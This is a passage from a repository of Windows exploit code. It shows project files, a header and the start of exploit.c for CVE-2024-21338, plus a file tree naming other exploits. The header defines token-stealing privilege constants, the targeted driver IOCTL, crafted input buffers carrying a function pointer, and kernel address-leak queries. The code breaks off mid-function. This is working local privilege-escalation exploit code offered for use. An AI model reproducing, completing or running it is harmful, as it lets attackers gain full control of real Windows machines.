└── Windows
├── CVE-2024-21338
├── CVE-2024-21338.png
├── CVE-2024-21338.sln
├── CVE-2024-21338
│ ├── CVE-2024-21338.vcxproj
│ ├── CVE-2024-21338.vcxproj.filters
│ ├── CVE-2024-21338.vcxproj.user
│ ├── Common.h
│ ├── exploit.c
│ └── main.c
└── readme.md
├── CVE-2024-38041
├── CVE-2024-38041.sln
├── CVE-2024-38041.vcxproj
├── CVE-2024-38041.vcxproj.filters
├── CVE-2024-38041.vcxproj.user
├── Common.h
├── exploit.c
├── main.c
└── readme.md
├── Crashdumps
└── 010_editor_crash.txt
└── SystemMechanicPro
├── Defs.h
└── exploit.c
/Windows/CVE-2024-21338/CVE-2024-21338.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Nero22k/Exploits/99e8c3957c8318e0305385adb92175034d1b3041/Windows/CVE-2024-21338/CVE-2024-21338.png
--------------------------------------------------------------------------------
/Windows/CVE-2024-21338/CVE-2024-21338.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.8.34330.188
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2024-21338", "CVE-2024-21338\CVE-2024-21338.vcxproj", "{B9E4FAD9-5B1F-4990-AF61-6A978F7F5BF6}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {B9E4FAD9-5B1F-4990-AF61-6A978F7F5BF6}.Debug|x64.ActiveCfg = Debug|x64
17 | {B9E4FAD9-5B1F-4990-AF61-6A978F7F5BF6}.Debug|x64.Build.0 = Debug|x64
18 | {B9E4FAD9-5B1F-4990-AF61-6A978F7F5BF6}.Debug|x86.ActiveCfg = Debug|Win32
19 | {B9E4FAD9-5B1F-4990-AF61-6A978F7F5BF6}.Debug|x86.Build.0 = Debug|Win32
20 | {B9E4FAD9-5B1F-4990-AF61-6A978F7F5BF6}.Release|x64.ActiveCfg = Release|x64
21 | {B9E4FAD9-5B1F-4990-AF61-6A978F7F5BF6}.Release|x64.Build.0 = Release|x64
22 | {B9E4FAD9-5B1F-4990-AF61-6A978F7F5BF6}.Release|x86.ActiveCfg = Release|Win32
23 | {B9E4FAD9-5B1F-4990-AF61-6A978F7F5BF6}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {72FE2A8A-AE33-4983-8401-4C1E8DEEEE6B}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/Windows/CVE-2024-21338/CVE-2024-21338/CVE-2024-21338.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 17.0
23 | Win32Proj
24 | {b9e4fad9-5b1f-4990-af61-6a978f7f5bf6}
25 | CVE202421338
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | true
77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
78 | true
79 |
80 |
81 | Console
82 | true
83 |
84 |
85 |
86 |
87 | Level3
88 | true
89 | true
90 | true
91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | true
93 |
94 |
95 | Console
96 | true
97 | true
98 | true
99 |
100 |
101 |
102 |
103 | Level3
104 | true
105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
106 | true
107 |
108 |
109 | Console
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | true
118 | true
119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
120 | true
121 | MultiThreaded
122 |
123 |
124 | Console
125 | true
126 | true
127 | true
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
--------------------------------------------------------------------------------
/Windows/CVE-2024-21338/CVE-2024-21338/CVE-2024-21338.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 |
--------------------------------------------------------------------------------
/Windows/CVE-2024-21338/CVE-2024-21338/CVE-2024-21338.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | 2136 10224
5 | WindowsLocalDebugger
6 |
7 |
--------------------------------------------------------------------------------
/Windows/CVE-2024-21338/CVE-2024-21338/Common.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 |
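// Entry point implemented in exploit.c. `(void)` makes this a real prototype in C
// (an empty parameter list declares an unchecked, old-style call) and matches
// the definition, which takes no arguments.
int exploit(void);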
6 |
// https://github.com/gtworek/PSBits/blob/e233709faa16a974d3af606c2dafe37ffe8f7aa9/Misc/TokenStealWithSyscalls.c
// Low parts of the well-known privilege LUIDs (LUID_AND_ATTRIBUTES.Luid.LowPart).
#define LUID_SE_ASSIGNPRIMARYTOKEN 3
#define LUID_SE_DEBUG 20
#define LUID_SE_IMPERSONATE 29
// Written in decimal: 262 == 0x106, the NTSTATUS STATUS_NOT_ALL_ASSIGNED that
// NtAdjustPrivilegesToken returns when a requested privilege is not held.
#define STATUS_NOT_ALL_ASSIGNED 262

// Print a failing status with the source line it was checked on.
// Msg must be a wide string: it is consumed by wprintf's %s.
// NOTE(review): the body is a bare `if {}`; it is not a single statement, so
// an `else` written directly after CHECK_STATUS(...) would bind to this `if`.
#define CHECK_STATUS(Msg, Status) if (ERROR_SUCCESS != (Status)) {wprintf(L"LINE %d: %s%lu\r\n", __LINE__, (Msg), (Status));}

// Control code sent by SendRequest() in exploit.c. Decoded with CTL_CODE:
// device type 0x22 (FILE_DEVICE_UNKNOWN), function 0x806, METHOD_BUFFERED,
// FILE_WRITE_ACCESS -- so the device handle has to be opened with write access.
#define IOCTL_AipSmartHashImageFile 0x22A018
16 |
// One-field wrapper around a function pointer; instantiated as `cfgFunction`
// in exploit() and referenced from the USER_BUFFER_* layouts below.
typedef struct _CFG_FUNCTION_WRAPPER
{
    PVOID FunctionPointer;
} CFG_FUNCTION_WRAPPER, * PCFG_FUNCTION_WRAPPER;
21 |
// Input-buffer layout used for builds below 22000 (selected by
// CheckWindowsVersionAndSetOffsets in exploit.c). Three pointer-sized fields;
// the per-field comments are the author's description of what the driver
// expects and are not verified here.
typedef struct _USER_BUFFER_W10
{
    UINT64 FirstArg; // 8 bytes - Reserved or used as needed
    PVOID Value; // 8 bytes - Should be 0 according to the requirement
    PCFG_FUNCTION_WRAPPER PtrToFunctionWrapper; // 8 bytes - Points to CFG_FUNCTION_WRAPPER
} USER_BUFFER_W10, * PUSER_BUFFER_W10;
28 |
// Input-buffer layout used for builds 22000 and above. Identical to
// USER_BUFFER_W10 except for the trailing Unknown field, which is why
// exploit.c sizes the allocation by build number.
typedef struct _USER_BUFFER_W11
{
    UINT64 FirstArg; // 8 bytes - Reserved or used as needed
    PVOID Value; // 8 bytes - Should be 0 according to the requirement
    PCFG_FUNCTION_WRAPPER PtrToFunctionWrapper; // 8 bytes - Points to CFG_FUNCTION_WRAPPER
    PVOID Unknown; // 8 bytes - Reserved or used as needed
} USER_BUFFER_W11, * PUSER_BUFFER_W11;
36 |
// Returned by NtQuerySystemInformation when the caller's buffer is too small;
// the query loops in exploit.c grow their buffer while they see this status.
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
// OBJECT_ATTRIBUTES.Attributes flag and NtCreateFile CreateDisposition used
// when exploit() opens the device.
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define FILE_OPEN 0x00000001
// NOTE(review): presumably the offset of _TOKEN.Privileges; this is a
// build-specific kernel layout value and is not validated anywhere in view.
#define OFFSET_OF_TOKEN_PRIVILEGES 0x40

// Same field assignments as the SDK's InitializeObjectAttributes, but with the
// SecurityQualityOfService passed explicitly as a sixth argument (the SDK
// macro takes five and sets it to NULL). The expansion is a brace block, not a
// single statement; keep it out of unbraced if/else bodies.
#define InitializeObjectAttributes( p, n, a, r, s, t ) { \
(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(p)->RootDirectory = r; \
(p)->Attributes = a; \
(p)->ObjectName = n; \
(p)->SecurityDescriptor = s; \
(p)->SecurityQualityOfService = t; \
}
51 |
// Minimal THREADINFOCLASS: only the class NtSetInformationThread is called with.
// 5 is the value the Windows driver kit headers give ThreadImpersonationToken.
typedef enum _THREADINFOCLASS
{
    ThreadImpersonationToken = 5 //Rust docs say so
} THREADINFOCLASS;
56 |
// Full SYSTEM_INFORMATION_CLASS table for NtQuerySystemInformation. Only two
// members are used by exploit.c: SystemModuleInformation (11) to find kernel
// image bases and SystemHandleInformation (16) to map handles to kernel
// object addresses. Both classes disclose kernel addresses and are therefore
// subject to access restrictions on newer Windows releases; callers must
// handle a failing status.
typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemBasicInformation = 0,
    SystemProcessorInformation = 1,
    SystemPerformanceInformation = 2,
    SystemTimeOfDayInformation = 3,
    SystemPathInformation = 4,
    SystemProcessInformation = 5,
    SystemCallCountInformation = 6,
    SystemDeviceInformation = 7,
    SystemProcessorPerformanceInformation = 8,
    SystemFlagsInformation = 9,
    SystemCallTimeInformation = 10,
    SystemModuleInformation = 11,
    SystemLocksInformation = 12,
    SystemStackTraceInformation = 13,
    SystemPagedPoolInformation = 14,
    SystemNonPagedPoolInformation = 15,
    SystemHandleInformation = 16,
    SystemObjectInformation = 17,
    SystemPageFileInformation = 18,
    SystemVdmInstemulInformation = 19,
    SystemVdmBopInformation = 20,
    SystemFileCacheInformation = 21,
    SystemPoolTagInformation = 22,
    SystemInterruptInformation = 23,
    SystemDpcBehaviorInformation = 24,
    SystemFullMemoryInformation = 25,
    SystemLoadGdiDriverInformation = 26,
    SystemUnloadGdiDriverInformation = 27,
    SystemTimeAdjustmentInformation = 28,
    SystemSummaryMemoryInformation = 29,
    SystemMirrorMemoryInformation = 30,
    SystemPerformanceTraceInformation = 31,
    SystemObsolete0 = 32,
    SystemExceptionInformation = 33,
    SystemCrashDumpStateInformation = 34,
    SystemKernelDebuggerInformation = 35,
    SystemContextSwitchInformation = 36,
    SystemRegistryQuotaInformation = 37,
    SystemExtendServiceTableInformation = 38,
    SystemPrioritySeperation = 39,
    SystemVerifierAddDriverInformation = 40,
    SystemVerifierRemoveDriverInformation = 41,
    SystemProcessorIdleInformation = 42,
    SystemLegacyDriverInformation = 43,
    SystemCurrentTimeZoneInformation = 44,
    SystemLookasideInformation = 45,
    SystemTimeSlipNotification = 46,
    SystemSessionCreate = 47,
    SystemSessionDetach = 48,
    SystemSessionInformation = 49,
    SystemRangeStartInformation = 50,
    SystemVerifierInformation = 51,
    SystemVerifierThunkExtend = 52,
    SystemSessionProcessInformation = 53,
    SystemLoadGdiDriverInSystemSpace = 54,
    SystemNumaProcessorMap = 55,
    SystemPrefetcherInformation = 56,
    SystemExtendedProcessInformation = 57,
    SystemRecommendedSharedDataAlignment = 58,
    SystemComPlusPackage = 59,
    SystemNumaAvailableMemory = 60,
    SystemProcessorPowerInformation = 61,
    SystemEmulationBasicInformation = 62,
    SystemEmulationProcessorInformation = 63,
    SystemExtendedHandleInformation = 64,
    SystemLostDelayedWriteInformation = 65,
    SystemBigPoolInformation = 66,
    SystemSessionPoolTagInformation = 67,
    SystemSessionMappedViewInformation = 68,
    SystemHotpatchInformation = 69,
    SystemObjectSecurityMode = 70,
    SystemWatchdogTimerHandler = 71,
    SystemWatchdogTimerInformation = 72,
    SystemLogicalProcessorInformation = 73,
    SystemWow64SharedInformationObsolete = 74,
    SystemRegisterFirmwareTableInformationHandler = 75,
    SystemFirmwareTableInformation = 76,
    SystemModuleInformationEx = 77,
    SystemVerifierTriageInformation = 78,
    SystemSuperfetchInformation = 79,
    SystemMemoryListInformation = 80,
    SystemFileCacheInformationEx = 81,
    SystemThreadPriorityClientIdInformation = 82,
    SystemProcessorIdleCycleTimeInformation = 83,
    SystemVerifierCancellationInformation = 84,
    SystemProcessorPowerInformationEx = 85,
    SystemRefTraceInformation = 86,
    SystemSpecialPoolInformation = 87,
    SystemProcessIdInformation = 88,
    SystemErrorPortInformation = 89,
    SystemBootEnvironmentInformation = 90,
    SystemHypervisorInformation = 91,
    SystemVerifierInformationEx = 92,
    SystemTimeZoneInformation = 93,
    SystemImageFileExecutionOptionsInformation = 94,
    SystemCoverageInformation = 95,
    SystemPrefetchPatchInformation = 96,
    SystemVerifierFaultsInformation = 97,
    SystemSystemPartitionInformation = 98,
    SystemSystemDiskInformation = 99,
    SystemProcessorPerformanceDistribution = 100,
    SystemNumaProximityNodeInformation = 101,
    SystemDynamicTimeZoneInformation = 102,
    SystemCodeIntegrityInformation = 103,
    SystemProcessorMicrocodeUpdateInformation = 104,
    SystemProcessorBrandString = 105,
    SystemVirtualAddressInformation = 106,
    SystemLogicalProcessorAndGroupInformation = 107,
    SystemProcessorCycleTimeInformation = 108,
    SystemStoreInformation = 109,
    SystemRegistryAppendString = 110,
    SystemAitSamplingValue = 111,
    SystemVhdBootInformation = 112,
    SystemCpuQuotaInformation = 113,
    SystemNativeBasicInformation = 114,
    SystemErrorPortTimeouts = 115,
    SystemLowPriorityIoInformation = 116,
    SystemBootEntropyInformation = 117,
    SystemVerifierCountersInformation = 118,
    SystemPagedPoolInformationEx = 119,
    SystemSystemPtesInformationEx = 120,
    SystemNodeDistanceInformation = 121,
    SystemAcpiAuditInformation = 122,
    SystemBasicPerformanceInformation = 123,
    SystemQueryPerformanceCounterInformation = 124,
    SystemSessionBigPoolInformation = 125,
    SystemBootGraphicsInformation = 126,
    SystemScrubPhysicalMemoryInformation = 127,
    SystemBadPageInformation = 128,
    SystemProcessorProfileControlArea = 129,
    SystemCombinePhysicalMemoryInformation = 130,
    SystemEntropyInterruptTimingInformation = 131,
    SystemConsoleInformation = 132,
    SystemPlatformBinaryInformation = 133,
    SystemPolicyInformation = 134,
    SystemHypervisorProcessorCountInformation = 135,
    SystemDeviceDataInformation = 136,
    SystemDeviceDataEnumerationInformation = 137,
    SystemMemoryTopologyInformation = 138,
    SystemMemoryChannelInformation = 139,
    SystemBootLogoInformation = 140,
    SystemProcessorPerformanceInformationEx = 141,
    SystemCriticalProcessErrorLogInformation = 142,
    SystemSecureBootPolicyInformation = 143,
    SystemPageFileInformationEx = 144,
    SystemSecureBootInformation = 145,
    SystemEntropyInterruptTimingRawInformation = 146,
    SystemPortableWorkspaceEfiLauncherInformation = 147,
    SystemFullProcessInformation = 148,
    SystemKernelDebuggerInformationEx = 149,
    SystemBootMetadataInformation = 150,
    SystemSoftRebootInformation = 151,
    SystemElamCertificateInformation = 152,
    SystemOfflineDumpConfigInformation = 153,
    SystemProcessorFeaturesInformation = 154,
    SystemRegistryReconciliationInformation = 155,
    SystemEdidInformation = 156,
    SystemManufacturingInformation = 157,
    SystemEnergyEstimationConfigInformation = 158,
    SystemHypervisorDetailInformation = 159,
    SystemProcessorCycleStatsInformation = 160,
    SystemVmGenerationCountInformation = 161,
    SystemTrustedPlatformModuleInformation = 162,
    SystemKernelDebuggerFlags = 163,
    SystemCodeIntegrityPolicyInformation = 164,
    SystemIsolatedUserModeInformation = 165,
    SystemHardwareSecurityTestInterfaceResultsInformation = 166,
    SystemSingleModuleInformation = 167,
    SystemAllowedCpuSetsInformation = 168,
    SystemVsmProtectionInformation = 169,
    SystemInterruptCpuSetsInformation = 170,
    SystemSecureBootPolicyFullInformation = 171,
    SystemCodeIntegrityPolicyFullInformation = 172,
    SystemAffinitizedInterruptProcessorInformation = 173,
    SystemRootSiloInformation = 174,
    SystemCpuSetInformation = 175,
    SystemCpuSetTagInformation = 176,
    SystemWin32WerStartCallout = 177,
    SystemSecureKernelProfileInformation = 178,
    SystemCodeIntegrityPlatformManifestInformation = 179,
    SystemInterruptSteeringInformation = 180,
    SystemSupportedProcessorArchitectures = 181,
    SystemMemoryUsageInformation = 182,
    SystemCodeIntegrityCertificateInformation = 183,
    SystemPhysicalMemoryInformation = 184,
    SystemControlFlowTransition = 185,
    SystemKernelDebuggingAllowed = 186,
    SystemActivityModerationExeState = 187,
    SystemActivityModerationUserSettings = 188,
    SystemCodeIntegrityPoliciesFullInformation = 189,
    SystemCodeIntegrityUnlockInformation = 190,
    SystemIntegrityQuotaInformation = 191,
    SystemFlushInformation = 192,
    SystemProcessorIdleMaskInformation = 193,
    SystemSecureDumpEncryptionInformation = 194,
    SystemWriteConstraintInformation = 195,
    SystemKernelVaShadowInformation = 196,
    SystemHypervisorSharedPageInformation = 197,
    SystemFirmwareBootPerformanceInformation = 198,
    SystemCodeIntegrityVerificationInformation = 199,
    SystemFirmwarePartitionInformation = 200,
    SystemSpeculationControlInformation = 201,
    SystemDmaGuardPolicyInformation = 202,
    SystemEnclaveLaunchControlInformation = 203,
    SystemWorkloadAllowedCpuSetsInformation = 204,
    SystemCodeIntegrityUnlockModeInformation = 205,
    SystemLeapSecondInformation = 206,
    SystemFlags2Information = 207,
    SystemSecurityModelInformation = 208,
    SystemCodeIntegritySyntheticCacheInformation = 209,
    SystemFeatureConfigurationInformation = 210,
    SystemFeatureConfigurationSectionInformation = 211,
    SystemFeatureUsageSubscriptionInformation = 212,
    SystemSecureSpeculationControlInformation = 213,
    SystemSpacesBootInformation = 214,
    SystemFwRamdiskInformation = 215,
    SystemWheaIpmiHardwareInformation = 216,
    SystemDifSetRuleClassInformation = 217,
    SystemDifClearRuleClassInformation = 218,
    SystemDifApplyPluginVerificationOnDriver = 219,
    SystemDifRemovePluginVerificationOnDriver = 220,
    SystemShadowStackInformation = 221,
    SystemBuildVersionInformation = 222,
    SystemPoolLimitInformation = 223,
    SystemCodeIntegrityAddDynamicStore = 224,
    SystemCodeIntegrityClearDynamicStores = 225,
    SystemDifPoolTrackingInformation = 226,
    SystemPoolZeroingInformation = 227,
    SystemDpcWatchdogInformation = 228,
    SystemDpcWatchdogInformation2 = 229,
    SystemSupportedProcessorArchitectures2 = 230,
    SystemSingleProcessorRelationshipInformation = 231,
    SystemXfgCheckFailureInformation = 232,
    SystemIommuStateInformation = 233,
    SystemHypervisorMinrootInformation = 234,
    SystemHypervisorBootPagesInformation = 235,
    SystemPointerAuthInformation = 236,
    SystemSecureKernelDebuggerInformation = 237,
    SystemOriginalImageFeatureInformation = 238,
    MaxSystemInfoClass = 239
} SYSTEM_INFORMATION_CLASS;
299 |
// One entry of the legacy (non-extended) SystemHandleInformation table.
// UniqueProcessId and HandleValue are only 16 bits wide here; exploit.c
// compares them with a 32-bit PID and a HANDLE, so values above 0xFFFF can
// never match and the lookup silently returns 0. __PADDING__ is a reserved
// identifier (leading double underscore) but is part of the layout, so it is
// left untouched.
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
    unsigned short UniqueProcessId;
    unsigned short CreatorBackTraceIndex;
    unsigned char ObjectTypeIndex;
    unsigned char HandleAttributes;
    unsigned short HandleValue;
    void* Object;
    unsigned long GrantedAccess;
    long __PADDING__[1];
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
311 |
// Variable-length result of SystemHandleInformation: a count followed by
// NumberOfHandles entries. Handles[1] is the pre-C99 trailing-array idiom;
// the real buffer is sized by NtQuerySystemInformation's ReturnLength.
typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG NumberOfHandles;
    struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
317 |
// One loaded kernel module as reported by SystemModuleInformation. exploit.c
// reads only Name (with strstr) and ImageBaseAddress.
// NOTE(review): this appears to mirror RTL_PROCESS_MODULE_INFORMATION with the
// leading HANDLE/PVOID pair replaced by Reserved ULONGs and Name sized 255
// where that structure's path field is 256; trailing alignment padding keeps
// the element stride equal on x64, so Modules[i] still indexes correctly --
// confirm before relying on the last byte of Name or building for x86.
typedef struct SYSTEM_MODULE {
    ULONG Reserved1;
    ULONG Reserved2;
#ifdef _WIN64
    ULONG Reserved3;
#endif
    PVOID ImageBaseAddress;
    ULONG ImageSize;
    ULONG Flags;
    WORD Id;
    WORD Rank;
    WORD w018;
    WORD NameOffset; // offset of the file name within Name (not used by exploit.c)
    CHAR Name[255];
}SYSTEM_MODULE, * PSYSTEM_MODULE;
333 |
// Variable-length result of SystemModuleInformation: ModulesCount entries
// follow the count; Modules[1] is the trailing-array idiom, the buffer is
// sized by the ReturnLength reported by NtQuerySystemInformation.
typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG ModulesCount;
    SYSTEM_MODULE Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
338 |
// Counted UTF-16 string used by the native API; Length and MaximumLength are
// in bytes, not characters. Filled by RtlInitUnicodeString in exploit().
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
344 |
// Object-name descriptor passed to NtCreateFile/NtOpenProcess. Populated by the
// InitializeObjectAttributes macro above, which sets Length to sizeof this struct.
typedef struct _OBJECT_ATTRIBUTES
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
354 |
// Completion record written by NtCreateFile and NtDeviceIoControlFile.
// The anonymous union (C11) overlays the final NTSTATUS with a pointer;
// Information carries a request-specific count.
typedef struct _IO_STATUS_BLOCK
{
    union
    {
        NTSTATUS Status;
        PVOID Pointer;
    };
    ULONG_PTR Information;
} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;
364 |
// Process/thread id pair as used by NtOpenProcess; both ids are carried in
// HANDLE-sized fields.
typedef struct _CLIENT_ID
{
    HANDLE UniqueProcess;
    HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;
370 |
// Function-pointer types for the ntdll exports this project calls directly,
// followed by the global pointers of those types. The globals are declared
// extern here and defined elsewhere (main.c is not in view); presumably they
// are resolved from ntdll at startup -- verify there before calling any of
// them, since an unresolved pointer is a NULL call.
typedef
VOID
(NTAPI* PIO_APC_ROUTINE) (
    IN PVOID ApcContext,
    IN PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG Reserved
);

typedef NTSTATUS (NTAPI* pNtOpenProcessToken)(HANDLE ProcessHandle, ACCESS_MASK DesiredAccess, PHANDLE TokenHandle);
typedef NTSTATUS (NTAPI* pNtAdjustPrivilegesToken)(HANDLE TokenHandle, BOOLEAN DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, ULONG BufferLength, PTOKEN_PRIVILEGES PreviousState, PULONG ReturnLength);
typedef NTSTATUS (NTAPI* pNtOpenProcess)(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
typedef NTSTATUS (NTAPI* pNtDuplicateToken)(HANDLE ExistingTokenHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, BOOLEAN EffectiveOnly, TOKEN_TYPE TokenType, PHANDLE NewTokenHandle);
typedef NTSTATUS (NTAPI* pNtSetInformationThread)(HANDLE ThreadHandle, THREADINFOCLASS ThreadInformationClass, PVOID ThreadInformation, ULONG ThreadInformationLength);
typedef NTSTATUS (NTAPI* pNtQueryInformationToken)(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, PVOID TokenInformation, ULONG TokenInformationLength, PULONG ReturnLength);
typedef NTSTATUS (NTAPI* pNtClose)(HANDLE Handle);

// Used by CheckWindowsVersionAndSetOffsets; unlike GetVersionEx it is not
// subject to application-manifest version lies.
typedef NTSTATUS(NTAPI* pRtlGetVersion)(LPOSVERSIONINFOEXW lpVersionInformation);

// SendRequest passes InputBuffer/InputBufferLength and no output buffer;
// note InputBufferLength is a ULONG, so a size_t length must be narrowed.
typedef NTSTATUS(NTAPI* pNtDeviceIoControlFile)(
    _In_ HANDLE FileHandle,
    _In_opt_ HANDLE Event,
    _In_opt_ PIO_APC_ROUTINE ApcRoutine,
    _In_opt_ PVOID ApcContext,
    _Out_ PIO_STATUS_BLOCK IoStatusBlock,
    _In_ ULONG IoControlCode,
    _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,
    _In_ ULONG InputBufferLength,
    _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,
    _In_ ULONG OutputBufferLength
);

typedef NTSTATUS(NTAPI* pNtWriteVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID BaseAddress,
    PVOID Buffer,
    ULONG NumberOfBytesToWrite,
    PULONG NumberOfBytesWritten
);

// exploit() opens the device with this, using FILE_OPEN as CreateDisposition.
typedef NTSTATUS(NTAPI* pNtCreateFile)(
    _Out_ PHANDLE FileHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _Out_ PIO_STATUS_BLOCK IoStatusBlock,
    _In_opt_ PLARGE_INTEGER AllocationSize,
    _In_ ULONG FileAttributes,
    _In_ ULONG ShareAccess,
    _In_ ULONG CreateDisposition,
    _In_ ULONG CreateOptions,
    _In_reads_bytes_opt_(EaLength) PVOID EaBuffer,
    _In_ ULONG EaLength
);

// Returns STATUS_INFO_LENGTH_MISMATCH with ReturnLength set when the buffer
// is too small; the callers in exploit.c loop on that.
typedef NTSTATUS(NTAPI* pNtQuerySystemInformation)(
    __in SYSTEM_INFORMATION_CLASS SystemInformationClass,
    __inout PVOID SystemInformation,
    __in ULONG SystemInformationLength,
    __out_opt PULONG ReturnLength
);

typedef VOID(NTAPI* pRtlInitUnicodeString)(
    _Out_ PUNICODE_STRING DestinationString,
    _In_opt_z_ PCWSTR SourceString
);

// Definitions live outside this header (expected in main.c).
extern pNtAdjustPrivilegesToken NtAdjustPrivilegesToken;
extern pNtOpenProcessToken NtOpenProcessToken;
extern pNtWriteVirtualMemory NtWriteVirtualMemory;
extern pNtOpenProcess NtOpenProcess;
extern pNtDuplicateToken NtDuplicateToken;
extern pNtSetInformationThread NtSetInformationThread;
extern pNtQueryInformationToken NtQueryInformationToken;
extern pNtClose NtClose;
extern pNtDeviceIoControlFile NtDeviceIoControlFile;
extern pNtCreateFile NtCreateFile;
extern pNtQuerySystemInformation NtQuerySystemInformation;
extern pRtlInitUnicodeString RtlInitUnicodeString;
extern pRtlGetVersion RtlGetVersion;
--------------------------------------------------------------------------------
/Windows/CVE-2024-21338/CVE-2024-21338/exploit.c:
--------------------------------------------------------------------------------
1 | #include "Common.h"
2 |
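/*
 * Query the running OS version and allocate the input buffer for its layout.
 *
 * kthreadoffset: receives the PreviousMode offset used later. The value 0x232
 *                is hard-coded and is not checked against the build that was
 *                just queried, so it is an assumption about the targeted
 *                builds -- TODO confirm per build.
 * osInfo:        filled by RtlGetVersion; dwOSVersionInfoSize is set here.
 *
 * Returns a zero-filled heap buffer of sizeof(USER_BUFFER_W10) for builds
 * below 22000 or sizeof(USER_BUFFER_W11) otherwise; NULL if the version query
 * or the allocation fails. The caller owns the buffer and must free() it.
 *
 * Change from the earlier version: calloc instead of malloc. The layout
 * comments in Common.h require Value to be zero, and malloc left every field
 * uninitialized.
 */
void* CheckWindowsVersionAndSetOffsets(size_t* kthreadoffset, OSVERSIONINFOEXW* osInfo)
{
    osInfo->dwOSVersionInfoSize = sizeof(*osInfo);

    NTSTATUS status = RtlGetVersion(osInfo);
    if (status != STATUS_SUCCESS) {
        wprintf(L"Failed to get OS version\n");
        return NULL;
    }

    wprintf(L"[+] Windows version: %lu.%lu Build %lu\n", osInfo->dwMajorVersion, osInfo->dwMinorVersion, osInfo->dwBuildNumber);

    *kthreadoffset = 0x232; // PreviousMode offset

    // Windows 11 builds start at 22000 and the W11 layout carries one extra
    // pointer-sized field, so the allocation size follows the build number.
    size_t bufferSize = (osInfo->dwBuildNumber < 22000)
        ? sizeof(USER_BUFFER_W10)
        : sizeof(USER_BUFFER_W11);

    void* userbuffer = calloc(1, bufferSize);
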